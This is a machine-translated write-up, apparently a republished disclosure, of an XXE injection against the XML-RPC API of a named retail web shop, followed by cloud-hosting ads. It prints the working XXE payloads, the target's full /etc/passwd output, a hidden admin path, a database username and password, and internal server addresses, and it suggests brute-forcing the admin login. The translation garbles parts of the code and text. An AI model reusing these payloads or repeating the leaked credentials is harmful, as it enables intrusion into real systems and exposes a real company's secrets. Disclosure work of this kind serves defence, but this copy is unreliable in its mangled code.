The vulnerability is caused by XML injection of Zend framework.
Details: Connection related to the vulnerability:
Http://www.80sec.com/xml-entity-injection.html
Http://sebug.net/vuldb/ssvid-60242
Zend announcement: http://framework.zend.com/security/advisory/ZF2012-01
Start question:
Target URl: shop.adidas.cn
Website Introduction: adads' online stores are built by open-source Magento and developed by Bysoft.
URL: shop.adidas.cn/api/Xmlrpc/index/
Shop.adidas.cn/info.php
Directly post data to shop.adidas.cn/api/xmlrpc/indexto passwd
<? Xml version = "1.0"?>
<! DOCTYPE foo [
<! ELEMENT methodName ANY>
<! ENTITY xxe SYSTEM "file: // etc/passwd">]>
<MethodCall>
<MethodName> & xxe; </methodName>
</MethodCall>
Get
Root: x: 0: 0: root:/bin/bash
Bin: x: 1: 1: bin:/sbin/nologin
Daemon: x: 2: 2: daemon:/sbin/nologin
Adm: x: 3: 4: adm:/var/adm:/sbin/nologin
Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin
Sync: x: 5: 0: sync:/sbin:/bin/sync
Shutdown: x: 6: 0: shutdown:/sbin/shutdown
Halt: x: 7: 0: halt:/sbin/halt
Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin
Uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin
Operator: x: 11: 0: operator:/root:/sbin/nologin
# Games: x: 12: 100: games:/usr/games:/sbin/nologin
Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin
# Ftp: x: 14: 50: FTP User:/var/ftp:/sbin/nologin
Nobody: x: 99: 99: Nobody: // sbin/nologin
Messages: x: 81: 81: System message bus: // sbin/nologin
Usbmuxd: x: 113: 113: usbmuxd user: // sbin/nologin
Oprofile: x: 16: 16: Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
Rpc: x: 32: 32: Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
Avahi-autoipd: x: 170: 170: Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin
Rtkit: x: 499: 496: RealtimeKit:/proc:/sbin/nologin
Abrt: x: 173: 173:/etc/abrt:/sbin/nologin
Hsqldb: x: 96: 96:/var/lib/hsqldb:/sbin/nologin
Saslauth: x: 498: 76: & quot; Saslauthd user & quot;:/var/empty/saslauth:/sbin/nologin
Apache: x: 48: 48: Apache:/var/www:/sbin/nologin
Avahi: x: 70: 70: Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
Postfix: x: 89: 89:/var/spool/postfix:/sbin/nologin
Qpidd: x: 497: 494: Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
Haldaemon: x: 68: 68: HAL daemon: // sbin/nologin
Rpcuser: x: 29: 29: RPC Service User:/var/lib/nfs:/sbin/nologin
Nfsnobody: x: 65534: 65534: Anonymous NFS User:/var/lib/nfs:/sbin/nologin
Ntp: x: 38: 38:/etc/ntp:/sbin/nologin
Tss: x: 59: 59: Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
Radvd: x: 75: 75: radvd user: // sbin/nologin
Qemu: x: 107: 107: qemu user: // sbin/nologin
Mysql: x: 27: 27: MySQL Server:/var/lib/mysql:/bin/bash
Pulse: x: 496: 493: PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
TPD: x: 42: 42:/var/lib/TPD:/sbin/nologin
Xguest: x: 500: 500: Guest:/home/xguest:/bin/bash
Stap-server: x: 155: 155: Systemtap Compile Server:/var/lib/stap-server:/sbin/nologin
Sshd: x: 74: 74: Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
Uuidd: x: 495: 487: UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
Tcpdump: x: 72: 72: // sbin/nologin
Userweb: x: 501: 501:/home/userweb:/bin/bash
Www: x: 502: 502:/dev/none:/sbin/nologin
# Nomal: x: 503: 503:/home/nomal:/bin/bash
Mailnull: x: 47: 47:/var/spool/mqueue:/sbin/nologin
Smmsp: x: 51: 51:/var/spool/mqueue:/sbin/nologin
Bysoft: x: 504: 504:/home/bysoft:/bin/bash
Another problem occurred while reading other files. Later, with the help of Jianxin's sister-in-law paper, I successfully read the configuration file of the website.
When reading files such as php and xml, base64 is required before restoration.
<? Xml version = "1.0"?> <! DOCTYPE foo [<! ELEMENT methodName ANY> <! ENTITY xxe SYSTEM "php: // filter/read = convert. base64-encode/resource = file: // etc/passswd ">]> <methodCall> <methodName> & xxe; </methodName> </methodCall>
Then I read the back-end address of the ad Website:
Https://shop.adidas.cn/index.php/adi_admin_das_online
Obtain the database configuration file:
<Host> <! [CDATA [172.16.201.12]> <Username> <! [CDATA [adidas_web]> </username>
<Password> <! [CDATA [8uhb % TGB]> </password>
<Dbname> <! [CDATA [adidas_11120]> </dbname>
<InitStatements> <! [CDATA [set names utf8]> </initStatements>
<Model> <! [CDATA [mysql4]> </model>
<Type> <! [CDATA [pdo_mysql]> </type>
<PdoType> <! [CDATA []> </pdoType>
<Active> 1 </active>
Get the memcached configuration file:
<Memcached>
<Servers>
<Server1>
<Host> <! [CDATA [172.16.200.10]> <Port> <! [CDATA [12000]> </port>
<Persistent> <! [CDATA [1]> </persistent>
</Server1>
<Server2>
<Host> <! [CDATA [172.16.200.11]> <Port> <! [CDATA [12000]> </port>
<Persistent> <! [CDATA [1]> </persistent>
</Server2>
</Servers>
<Compression> <! [CDATA [0]> </compression>
<Cache_dir> <! [CDATA []> </cache_dir>
<Hashed_directory_level> <! [CDATA []> <Hashed_directory_umask> <! [CDATA []> <File_name_prefix> <! [CDATA []> </file_name_prefix>
</Memcached>
In fact, you can get the background address. Before Magento1.7, there was no verification code in the background .. Attackers can directly crack the background username and password.
Not going further...
Solution:
View me: http://www.bkjia.com/Article/201208/149569.html
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
